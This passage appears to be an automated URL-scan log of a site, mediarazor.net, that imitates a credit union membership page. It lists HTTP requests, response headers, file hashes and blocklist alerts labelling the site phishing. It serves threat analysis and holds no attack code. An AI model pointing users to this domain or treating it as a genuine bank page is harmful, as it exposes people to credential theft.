Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://mediarazor.net/BecomeMember/CreditUnion/BecomeAMember/EnjoyConvinience/isotope.min.css

                                         
                                         192.185.141.13
HTTP/1.1 200 OK
Content-Type: image/png
                                        
Date: Mon, 26 Sep 2022 14:11:24 GMT
Server: Apache
Last-Modified: Mon, 25 Jul 2022 08:40:22 GMT
Accept-Ranges: bytes
Content-Length: 6884
Keep-Alive: timeout=5, max=72
Connection: Keep-Alive


--- Additional Info ---
Magic:  PNG image data, 285 x 132, 8-bit/color RGBA, non-interlaced\012- data
Size:   6884
Md5:    793de00c2e5c94dfe4d879e33f78ef40
Sha1:   1fbca0c5c7261136ba2dcbf11b98c975d442e8f0
Sha256: 2dc417c13f956f7a5f91634d4629bcc1492ac237ba8839f8513227ae02b510d2
                                        
                                            GET /BecomeMember/CreditUnion/BecomeAMember/EnjoyConvinience/KFOmCnqEu92Fr1Mu4mxK.woff2 HTTP/1.1 
Host: mediarazor.net
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: application/font-woff2;q=1.0,application/font-woff;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: identity
Connection: keep-alive
Referer: http://mediarazor.net/BecomeMember/CreditUnion/BecomeAMember/EnjoyConvinience/css.css

                                         
                                         192.185.141.13
HTTP/1.1 200 OK
Content-Type: font/woff2
                                        
Date: Mon, 26 Sep 2022 14:11:24 GMT
Server: Apache
Last-Modified: Mon, 25 Jul 2022 08:40:22 GMT
Accept-Ranges: bytes
Content-Length: 15744
Keep-Alive: timeout=5, max=72
Connection: Keep-Alive


--- Additional Info ---
Magic:  Web Open Font Format (Version 2), TrueType, length 15744, version 1.0\012- data
Size:   15744
Md5:    15d9f621c3bd1599f0169dcf0bd5e63e
Sha1:   7ca9c5967f3bb8bffeab24b639b49c1e7d03fa52
Sha256: f6734f8177112c0839b961f96d813fcb189d81b60e96c33278c1983b6f419615

Alerts:
  Blocklists:
    - fortinet: Phishing
                                        
                                            GET /BecomeMember/CreditUnion/BecomeAMember/EnjoyConvinience/Alkami.woff2 HTTP/1.1 
Host: mediarazor.net
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: application/font-woff2;q=1.0,application/font-woff;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: identity
Connection: keep-alive
Referer: http://mediarazor.net/BecomeMember/CreditUnion/BecomeAMember/EnjoyConvinience/font-icons.css

                                         
                                         192.185.141.13
HTTP/1.1 200 OK
Content-Type: font/woff2
                                        
Date: Mon, 26 Sep 2022 14:11:24 GMT
Server: Apache
Last-Modified: Mon, 25 Jul 2022 08:40:24 GMT
Accept-Ranges: bytes
Content-Length: 41996
Keep-Alive: timeout=5, max=72
Connection: Keep-Alive


--- Additional Info ---
Magic:  Web Open Font Format (Version 2), TrueType, length 41996, version 1.0\012- data
Size:   41996
Md5:    9bab7c933f08a12a295e21545ad2a0f8
Sha1:   9599b3ee762f6590f343d053655bf264c26b88c3
Sha256: b7b1c6cd2548b080ab56c2ea21154100f663a1321b34750b6fd06a895f87cc7a

Alerts:
  Blocklists:
    - fortinet: Phishing
                                        
                                            GET /BecomeMember/CreditUnion/BecomeAMember/EnjoyConvinience/android-chrome-192x192.png HTTP/1.1 
Host: mediarazor.net
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://mediarazor.net/?e=/

                                         
                                         192.185.141.13
HTTP/1.1 200 OK
Content-Type: image/png
                                        
Date: Mon, 26 Sep 2022 14:11:24 GMT
Server: Apache
Last-Modified: Mon, 25 Jul 2022 08:40:20 GMT
Accept-Ranges: bytes
Content-Length: 1384
Keep-Alive: timeout=5, max=71
Connection: Keep-Alive


--- Additional Info ---
Magic:  PNG image data, 192 x 192, 8-bit colormap, non-interlaced\012- data
Size:   1384
Md5:    617c4058b7a5608d8794cfb57c722d5e
Sha1:   f12b2ca683ad372cc2a27a2fb3ab39d86187d2cd
Sha256: 532ab0216976347b86739466a2366f058dacb5a6741aedd9242d0c898841692e
                                        
                                            GET /BecomeMember/CreditUnion/BecomeAMember/EnjoyConvinience/favicon-16x16.png HTTP/1.1 
Host: mediarazor.net
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://mediarazor.net/?e=/

                                         
                                         192.185.141.13
HTTP/1.1 200 OK
Content-Type: image/png
                                        
Date: Mon, 26 Sep 2022 14:11:24 GMT
Server: Apache
Last-Modified: Mon, 25 Jul 2022 08:40:20 GMT
Accept-Ranges: bytes
Content-Length: 453
Keep-Alive: timeout=5, max=71
Connection: Keep-Alive


--- Additional Info ---
Magic:  PNG image data, 16 x 16, 8-bit colormap, non-interlaced\012- data
Size:   453
Md5:    73e77c462e9cf12b81e6eadcca253f6a
Sha1:   d8594646b979c09f848519271a79f1042106297d
Sha256: d1ffdd528c8b988b8e8c5020c870bfce1a2bb5fa5b323cbf8576639dffa4db1b
                                        
                                            POST / HTTP/1.1 
Host: ocsp.godaddy.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 76
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

                                         
                                         192.124.249.23
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Server: Sucuri/Cloudproxy
Date: Mon, 26 Sep 2022 14:11:25 GMT
Content-Length: 1778
Connection: keep-alive
X-Sucuri-ID: 19023
Content-Transfer-Encoding: Binary
Cache-Control: public, no-transform, must-revalidate
Last-Modified: Mon, 26 Sep 2022 11:18:07 GMT
Expires: Tue, 27 Sep 2022 11:18:07 GMT
ETag: "c66420e8b7c8a9840e10cc0a8afc3b739b71dc1a"
P3P: CP="IDC DSP COR LAW CUR ADM DEV TAI PSA PSD IVA IVD HIS OUR SAM PUB LEG UNI COM NAV STA"


--- Additional Info ---
Magic:  data
Size:   1778
Md5:    de9f9fb4ac3da259ff181fce551f6c46
Sha1:   c66420e8b7c8a9840e10cc0a8afc3b739b71dc1a
Sha256: 728f60d9237b6a7de96bf41460fea3d7cac9acf785fa2c70e2d2dca614668a7c
                                        
                                            POST /client/v3.1/web/wup?cid=attina HTTP/1.1 
Host: wup-1ca8ebd0.us.v2.we-stats.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: text/plain;charset=UTF-8
Content-Length: 172
Origin: http://mediarazor.net
Connection: keep-alive
Referer: http://mediarazor.net/
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site

                                         
                                         52.141.217.134
HTTP/2 200 OK
content-type: application/json
                                        
content-length: 898
date: Mon, 26 Sep 2022 14:11:24 GMT
server: uvicorn
access-control-allow-origin: *
access-control-allow-credentials: true
cache-control: no-cache, no-store
pragma: no-cache
tail-id: 438a1724-5684-4293-8035-12b1f2e2e761
strict-transport-security: max-age=31536000; includeSubDomains
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  JSON data\012- , ASCII text, with very long lines (898), with no line terminators
Size:   898
Md5:    a70141535f542347b05694391b5c122d
Sha1:   cbed5f93e6bcf6987dd8f9ba8ddfc79fd9f592e7
Sha256: 0e07eb9d7aa188bff79ad9ab709c7b7783be94a2dffe11427d540abb2e5ca94c
                                        
                                            GET /scripts/prod/crossdomain.html HTTP/1.1 
Host: 1.b406929acabac9b095f124c81bdfcf57f.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: http://mediarazor.net/
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: iframe
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: cross-site

                                         
                                         54.230.111.12
HTTP/2 200 OK
content-type: text/html
                                        
content-length: 221
last-modified: Tue, 13 Oct 2020 12:04:25 GMT
x-amz-version-id: null
accept-ranges: bytes
server: AmazonS3
date: Mon, 26 Sep 2022 10:44:19 GMT
etag: "21e34cf6a03f570df49e212018a567d0"
x-cache: Hit from cloudfront
via: 1.1 a2c3c8b833b34851dca4f7753ecaae58.cloudfront.net (CloudFront)
x-amz-cf-pop: OSL50-P1
x-amz-cf-id: dXZCt8RS61RQT4fhgC3CJhb4u62oaiMlkC-19J3mIJgsF_4v7F30xg==
age: 12427
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  HTML document text\012- HTML document text\012- HTML document text\012- HTML document text\012- exported SGML document, ASCII text
Size:   221
Md5:    21e34cf6a03f570df49e212018a567d0
Sha1:   f0be4058936850ae0163f5137600d14b6632bbb3
Sha256: 0a23512ea579554af1f2614d6dea6120d38660028fc7624c71a978478fae0eb6
                                        
                                            POST / HTTP/1.1 
Host: ocsp.sectigo.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 84
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

                                         
                                         172.64.155.188
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Date: Mon, 26 Sep 2022 14:11:25 GMT
Content-Length: 472
Connection: keep-alive
Last-Modified: Sun, 25 Sep 2022 00:17:20 GMT
Expires: Sun, 02 Oct 2022 00:17:19 GMT
Etag: "a29b4b75545fb24e3e8df8fb02a109b18fd98b15"
Cache-Control: max-age=467753,s-maxage=1800,public,no-transform,must-revalidate
X-CCACDN-Proxy-ID: mcdpinlb2
X-Frame-Options: SAMEORIGIN
CF-Cache-Status: DYNAMIC
Server: cloudflare
CF-RAY: 750c96b45e180b51-OSL

                                        
                                            GET /scripts/prod/crossdomain.html HTTP/1.1 
Host: 1.a79ab95c1589a13f8a4cab612bc71f9f7.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: http://mediarazor.net/
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: iframe
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: cross-site

                                         
                                         54.230.111.22
HTTP/2 200 OK
content-type: text/html
                                        
content-length: 221
last-modified: Tue, 13 Oct 2020 12:04:25 GMT
x-amz-version-id: null
accept-ranges: bytes
server: AmazonS3
date: Sun, 25 Sep 2022 20:36:22 GMT
etag: "21e34cf6a03f570df49e212018a567d0"
x-cache: Hit from cloudfront
via: 1.1 e2f427863e6bdb72ad8bed72b596d81e.cloudfront.net (CloudFront)
x-amz-cf-pop: OSL50-P1
x-amz-cf-id: 9GYUPZSCMqmNb331XhQvG72n--_g2UJn_AsiuDL8375HGRPSxJVdQw==
age: 63304
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  HTML document text\012- HTML document text\012- HTML document text\012- HTML document text\012- exported SGML document, ASCII text
Size:   221
Md5:    21e34cf6a03f570df49e212018a567d0
Sha1:   f0be4058936850ae0163f5137600d14b6632bbb3
Sha256: 0a23512ea579554af1f2614d6dea6120d38660028fc7624c71a978478fae0eb6
                                        
                                            POST / HTTP/1.1 
Host: ocsp.sectigo.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 84
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

                                         
                                         172.64.155.188
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Date: Mon, 26 Sep 2022 14:11:25 GMT
Content-Length: 472
Connection: keep-alive
Last-Modified: Fri, 23 Sep 2022 18:00:06 GMT
Expires: Fri, 30 Sep 2022 18:00:05 GMT
Etag: "bfc8ad4c0d95b416a31f18ccdb94d29e33c1f695"
Cache-Control: max-age=358719,s-maxage=1800,public,no-transform,must-revalidate
X-CCACDN-Proxy-ID: mcdpinlb1
X-Frame-Options: SAMEORIGIN
CF-Cache-Status: DYNAMIC
Server: cloudflare
CF-RAY: 750c96b47fa9b50b-OSL

                                        
                                            GET /scripts/prod/crossdomain.html HTTP/1.1 
Host: 1.c81358859121583b7adf2ace89cb39f44.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: http://mediarazor.net/
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: iframe
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: cross-site

                                         
                                         54.230.111.34
HTTP/2 200 OK
content-type: text/html
                                        
content-length: 221
last-modified: Tue, 13 Oct 2020 12:04:25 GMT
x-amz-version-id: null
accept-ranges: bytes
server: AmazonS3
date: Sun, 25 Sep 2022 18:38:57 GMT
etag: "21e34cf6a03f570df49e212018a567d0"
x-cache: Hit from cloudfront
via: 1.1 9037b7743a833da13439f0d4e2619b52.cloudfront.net (CloudFront)
x-amz-cf-pop: OSL50-P1
x-amz-cf-id: sMMiYxhYxjTdZ-G9eCT85yT72tvu0XX-WvdO9CpnKVkILWF4FJpETg==
age: 70349
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  HTML document text\012- HTML document text\012- HTML document text\012- HTML document text\012- exported SGML document, ASCII text
Size:   221
Md5:    21e34cf6a03f570df49e212018a567d0
Sha1:   f0be4058936850ae0163f5137600d14b6632bbb3
Sha256: 0a23512ea579554af1f2614d6dea6120d38660028fc7624c71a978478fae0eb6
                                        
                                            POST / HTTP/1.1 
Host: r3.o.lencr.org
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 85
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

                                         
                                         23.36.76.226
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Server: nginx
Content-Length: 503
ETag: "0E47D6E33FE9F6E588D308B62FA059C960A000C56651713E30BAF6CD09B7DE41"
Last-Modified: Sun, 25 Sep 2022 22:00:00 UTC
Cache-Control: public, no-transform, must-revalidate, max-age=14311
Expires: Mon, 26 Sep 2022 18:09:56 GMT
Date: Mon, 26 Sep 2022 14:11:25 GMT
Connection: keep-alive

                                        
                                            POST / HTTP/1.1 
Host: r3.o.lencr.org
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 85
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

                                         
                                         23.36.76.226
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Server: nginx
Content-Length: 503
ETag: "0E47D6E33FE9F6E588D308B62FA059C960A000C56651713E30BAF6CD09B7DE41"
Last-Modified: Sun, 25 Sep 2022 22:00:00 UTC
Cache-Control: public, no-transform, must-revalidate, max-age=14311
Expires: Mon, 26 Sep 2022 18:09:56 GMT
Date: Mon, 26 Sep 2022 14:11:25 GMT
Connection: keep-alive

                                        
                                            POST / HTTP/1.1 
Host: r3.o.lencr.org
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 85
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

                                         
                                         23.36.76.226
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Server: nginx
Content-Length: 503
ETag: "0E47D6E33FE9F6E588D308B62FA059C960A000C56651713E30BAF6CD09B7DE41"
Last-Modified: Sun, 25 Sep 2022 22:00:00 UTC
Cache-Control: public, no-transform, must-revalidate, max-age=14311
Expires: Mon, 26 Sep 2022 18:09:56 GMT
Date: Mon, 26 Sep 2022 14:11:25 GMT
Connection: keep-alive

                                        
                                            POST / HTTP/1.1 
Host: r3.o.lencr.org
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 85
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

                                         
                                         23.36.76.226
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Server: nginx
Content-Length: 503
ETag: "0E47D6E33FE9F6E588D308B62FA059C960A000C56651713E30BAF6CD09B7DE41"
Last-Modified: Sun, 25 Sep 2022 22:00:00 UTC
Cache-Control: public, no-transform, must-revalidate, max-age=14311
Expires: Mon, 26 Sep 2022 18:09:56 GMT
Date: Mon, 26 Sep 2022 14:11:25 GMT
Connection: keep-alive

                                        
                                            POST / HTTP/1.1 
Host: r3.o.lencr.org
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 85
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

                                         
                                         23.36.76.226
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Server: nginx
Content-Length: 503
ETag: "0E47D6E33FE9F6E588D308B62FA059C960A000C56651713E30BAF6CD09B7DE41"
Last-Modified: Sun, 25 Sep 2022 22:00:00 UTC
Cache-Control: public, no-transform, must-revalidate, max-age=14311
Expires: Mon, 26 Sep 2022 18:09:56 GMT
Date: Mon, 26 Sep 2022 14:11:25 GMT
Connection: keep-alive

                                        
                                            GET /296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs3.amazonaws.com%2Fpocket-curatedcorpusapi-prod-images%2F0f164d87-257d-468b-9a99-3559bced005c.jpeg HTTP/1.1 
Host: img-getpocket.cdn.mozilla.net
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Origin: null
Connection: keep-alive
Sec-Fetch-Dest: image
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site

                                         
                                         34.120.237.76
HTTP/2 200 OK
content-type: image/jpeg
                                        
server: nginx
content-length: 9070
x-amzn-requestid: 2aceb075-d4bc-45b8-8330-5e719c565f77
x-xss-protection: 1; mode=block
access-control-allow-origin: *
strict-transport-security: max-age=63072000; includeSubdomains; preload
x-frame-options: DENY
content-security-policy: default-src 'none'; img-src 'self'; script-src 'self'; style-src 'self'; object-src 'none'
x-amz-apigw-id: ZCSKEEdPoAMFsNw=
x-content-type-options: nosniff
x-amzn-trace-id: Root=1-6330ca40-3f120e0774b1d58a08898c39;Sampled=0
x-amzn-remapped-date: Sun, 25 Sep 2022 21:38:08 GMT
x-amz-cf-pop: HIO50-C1, SEA73-P1
x-cache: Hit from cloudfront
x-amz-cf-id: feNiTFDhUx-BfoiybnKj83hCq6CCoiMeOSEHyFs8b7cLIgKvnO1Cdw==
via: 1.1 8f22423015641505b8c857a37450d6c0.cloudfront.net (CloudFront), 1.1 73cb83fe6699afc2791b5c690c1ff8c6.cloudfront.net (CloudFront), 1.1 google
date: Sun, 25 Sep 2022 22:04:42 GMT
age: 58003
etag: "c16a6f018bd80c6390b7a07f4e6698db7bfd28b0"
cache-control: max-age=3600,public,public
alt-svc: clear
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 296x148, components 3\012- data
Size:   9070
Md5:    988b0c94c41a21c736b330c3256d0a3c
Sha1:   c16a6f018bd80c6390b7a07f4e6698db7bfd28b0
Sha256: 3034912f83810b3999ffa90f5eeaf0f45773c592cfd3cf2bfb794ea1b150158c
                                        
                                            GET /296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs3.amazonaws.com%2Fpocket-curatedcorpusapi-prod-images%2Ff6bfaf0f-e716-4cf7-9785-ffcd146aed68.jpeg HTTP/1.1 
Host: img-getpocket.cdn.mozilla.net
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Origin: null
Connection: keep-alive
Sec-Fetch-Dest: image
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site

                                         
                                         34.120.237.76
HTTP/2 200 OK
content-type: image/jpeg
                                        
server: nginx
content-length: 7648
x-amzn-requestid: 359116cc-4e08-4c57-8aba-0aa7bd232c98
x-xss-protection: 1; mode=block
access-control-allow-origin: *
strict-transport-security: max-age=63072000; includeSubdomains; preload
x-frame-options: DENY
content-security-policy: default-src 'none'; img-src 'self'; script-src 'self'; style-src 'self'; object-src 'none'
x-amz-apigw-id: ZCSKWG2BIAMFlHw=
x-content-type-options: nosniff
x-amzn-trace-id: Root=1-6330ca42-2130239f2dab781c0f49f0e4;Sampled=0
x-amzn-remapped-date: Sun, 25 Sep 2022 21:38:10 GMT
x-amz-cf-pop: HIO50-C1, SEA73-P1
x-cache: Hit from cloudfront
x-amz-cf-id: sGZMSLXPUq8Ssxe_SFGePrvvnUGePGb7ZQn3RYH20EKwN2vzpA1RjQ==
via: 1.1 d83ae0e1ba84e92e58bc1efc23a0c652.cloudfront.net (CloudFront), 1.1 32d624dbeb2a8b7f24dbe49007e37c90.cloudfront.net (CloudFront), 1.1 google
date: Sun, 25 Sep 2022 21:48:52 GMT
age: 58953
etag: "042d4b6927f80c5a44bb7baf77b763577c19ed36"
cache-control: max-age=3600,public,public
alt-svc: clear
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 296x148, components 3\012- data
Size:   7648
Md5:    75a459d4f554d38a1701e727185c7e91
Sha1:   042d4b6927f80c5a44bb7baf77b763577c19ed36
Sha256: c01b0d3a28ed31ec9432d879310cffa313260f97044f1ed473aa0331bdba5607
                                        
                                            GET /scripts/prod/crossdomain2.12.0.5273.b96c35cc.min.js HTTP/1.1 
Host: 1.b406929acabac9b095f124c81bdfcf57f.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://1.b406929acabac9b095f124c81bdfcf57f.com/scripts/prod/crossdomain.html
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers

                                         
                                         54.230.111.12
HTTP/2 200 OK
content-type: application/javascript
                                        
content-length: 3227
date: Sun, 25 Sep 2022 18:21:19 GMT
last-modified: Tue, 13 Oct 2020 12:04:25 GMT
etag: "9ee48a4da9c402e8a23ad085fb71f28f"
x-amz-version-id: null
accept-ranges: bytes
server: AmazonS3
x-cache: Hit from cloudfront
via: 1.1 a2c3c8b833b34851dca4f7753ecaae58.cloudfront.net (CloudFront)
x-amz-cf-pop: OSL50-P1
x-amz-cf-id: vLdC0MlZTMbr26oBj7_A3hwpZ8Mf4tS3fI8ETxnsshPB598svPrwsw==
age: 71407
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  ASCII text, with very long lines (3227), with no line terminators
Size:   3227
Md5:    9ee48a4da9c402e8a23ad085fb71f28f
Sha1:   f0c59306d6313f9bee02b53ca8903991bd24bfd7
Sha256: 9cdad69a4b967c882c3d8e9cb054e7334b7f8870e96427a5d20ae2d17eff2622
                                        
                                            GET /296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs3.amazonaws.com%2Fpocket-curatedcorpusapi-prod-images%2Febd85aa2-fe15-49c2-aa3e-38b97cb99849.jpeg HTTP/1.1 
Host: img-getpocket.cdn.mozilla.net
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Origin: null
Connection: keep-alive
Sec-Fetch-Dest: image
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site

                                         
                                         34.120.237.76
HTTP/2 200 OK
content-type: image/jpeg
                                        
server: nginx
content-length: 5157
x-amzn-requestid: b5748f49-693f-4bc3-a850-cb68e770de24
x-xss-protection: 1; mode=block
access-control-allow-origin: *
strict-transport-security: max-age=63072000; includeSubdomains; preload
x-frame-options: DENY
content-security-policy: default-src 'none'; img-src 'self'; script-src 'self'; style-src 'self'; object-src 'none'
x-amz-apigw-id: ZCUG9GUHIAMF7pw=
x-content-type-options: nosniff
x-amzn-trace-id: Root=1-6330cd5f-5d2aaa212cf1be2506593746;Sampled=0
x-amzn-remapped-date: Sun, 25 Sep 2022 21:51:27 GMT
x-amz-cf-pop: HIO50-C1, SEA73-P1
x-cache: Miss from cloudfront
x-amz-cf-id: 4h9lb_7egxb2hBbxjcS_cpZ5lDq6Lx-c_WUZyRHdUA0YTwr6kgDuiQ==
via: 1.1 86b676273517904f44af31586adb06ae.cloudfront.net (CloudFront), 1.1 5fe5f2a3903f1378941d92eceaf3fa16.cloudfront.net (CloudFront), 1.1 google
date: Sun, 25 Sep 2022 22:10:16 GMT
age: 57669
etag: "85e378d0fff856832a8dd01743516b9476fed8c6"
cache-control: max-age=3600,public,public
alt-svc: clear
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 296x148, components 3\012- data
Size:   5157
Md5:    2fe8c4f0c70fb6c1f4259eabedc7015e
Sha1:   85e378d0fff856832a8dd01743516b9476fed8c6
Sha256: 508a1c7d350fcf82d1ece0b99f8557b2f300c7c1148f28c3ae9fece20530e4b6
                                        
                                            GET /296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs3.amazonaws.com%2Fpocket-curatedcorpusapi-prod-images%2F1deb918e-bcb0-4629-aaa7-0ae0322969be.jpeg HTTP/1.1 
Host: img-getpocket.cdn.mozilla.net
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Origin: null
Connection: keep-alive
Sec-Fetch-Dest: image
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site

                                         
                                         34.120.237.76
HTTP/2 200 OK
content-type: image/jpeg
                                        
server: nginx
content-length: 12826
x-amzn-requestid: f075cf62-acfc-4bc1-be14-7c3dafb7aaed
x-xss-protection: 1; mode=block
access-control-allow-origin: *
strict-transport-security: max-age=63072000; includeSubdomains; preload
x-frame-options: DENY
content-security-policy: default-src 'none'; img-src 'self'; script-src 'self'; style-src 'self'; object-src 'none'
x-amz-apigw-id: YfVRNFP-oAMFgrA=
x-content-type-options: nosniff
x-amzn-trace-id: Root=1-6322cf3a-184b678042d64ac9266b1128;Sampled=0
x-amzn-remapped-date: Thu, 15 Sep 2022 07:07:38 GMT
x-amz-cf-pop: SEA73-P1
x-cache: Hit from cloudfront
x-amz-cf-id: rN_8rm10Pxb0AUKW6ECfNulcYxBaS7FgGD15gT14dX-FlsGJfqahxA==
via: 1.1 7f5e0d3b9ea85d0d75063a66c0ebc840.cloudfront.net (CloudFront), 1.1 89791e6b21b9a30cc51cac1bc51cf098.cloudfront.net (CloudFront), 1.1 google
date: Sun, 25 Sep 2022 21:37:35 GMT
age: 59630
etag: "b6d56333d7f1ea7ddc8838d84de498ff913c5464"
cache-control: max-age=3600,public,public
alt-svc: clear
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 296x148, components 3 DIY-Thermocam raw data\012- (Lepton 2.x), scale 3-257, spot sensor temperature 0.000000, unit celsius, color scheme 0, show scale bar, calibration: offset 0.000000, slope 241253891388563521536.000000\012- data
Size:   12826
Md5:    b3a72e81317074689a71dac7059e4b6a
Sha1:   b6d56333d7f1ea7ddc8838d84de498ff913c5464
